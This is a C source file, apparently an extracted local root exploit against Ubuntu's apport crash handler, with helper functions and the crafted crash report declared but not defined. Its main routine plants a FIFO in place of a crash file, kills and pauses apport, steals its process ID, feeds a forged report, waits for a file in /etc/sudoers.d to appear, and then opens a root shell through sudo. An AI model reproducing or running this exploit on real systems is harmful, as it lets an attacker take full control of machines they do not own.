
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct stat {int st_size; } ;
struct rlimit {void* rlim_max; void* rlim_cur; } ;


 int O_WRONLY ;
 int RLIMIT_CORE ;
 void* RLIM_INFINITY ;
 int SIGSTOP ;
 int S_IFIFO ;
 int apport_pid ;
 int checker () ;
 int close (int) ;
 int crash_report ;
 int crasher () ;
 int exit (int ) ;
 int fork () ;
 int fprintf (int ,char*,...) ;
 int getuid () ;
 int kill (int,int) ;
 int mknod (char*,int,int ) ;
 int open (char*,int ) ;
 char* report ;
 int setrlimit (int ,struct rlimit*) ;
 int sleep (int) ;
 int sprintf (char*,char*,int) ;
 int stat (char*,struct stat*) ;
 int stderr ;
 int steal_pid (int) ;
 int strlen (int ) ;
 int system (char*) ;
 int unlink (char*) ;
 int usleep (int) ;
 int write (int,int ,int ) ;

int main(void)
{
    int pid, checker_pid, fd;
    struct rlimit limits;
    struct stat s;

    limits.rlim_cur = RLIM_INFINITY;
    limits.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &limits);

    pid = fork();

    if(pid == 0)
        crasher();

    sprintf(report, "/var/crash/_bin_sleep.%d.crash", getuid());

    unlink(report);
    mknod(report, S_IFIFO | 0666, 0);

    fprintf(stderr,"created %s\n", report);

    usleep(300000);
    kill(pid, 11);
    apport_pid = pid + 1;


    fprintf(stderr,"apport stopped, pid = %d\n", apport_pid);

    usleep(300000);

    kill(pid, 9);
    steal_pid(pid);
    sleep(1);

    kill(apport_pid, SIGSTOP);

    checker_pid = fork();

    if(checker_pid == 0) {
        checker();
        exit(0);
    }

    fprintf(stderr,"sleeping 2s..\n");
    sleep(2);

    fprintf(stderr,"writing to fifo\n");

    fd = open(report, O_WRONLY);
    write(fd, crash_report, strlen(crash_report));
    close(fd);

    fprintf(stderr,"fifo written.. wait...\n");
    fprintf(stderr,"waiting for /etc/sudoers.d/core to appear..\n");

    while(1) {
        stat("/etc/sudoers.d/core", &s);
        if(s.st_size == 37)
            break;
        usleep(100000);
    }

    fprintf(stderr,"success\n");
    kill(pid, 9);
    kill(checker_pid, 9);
    return system("sudo -- sh -c 'stty echo;sh -i'");
}
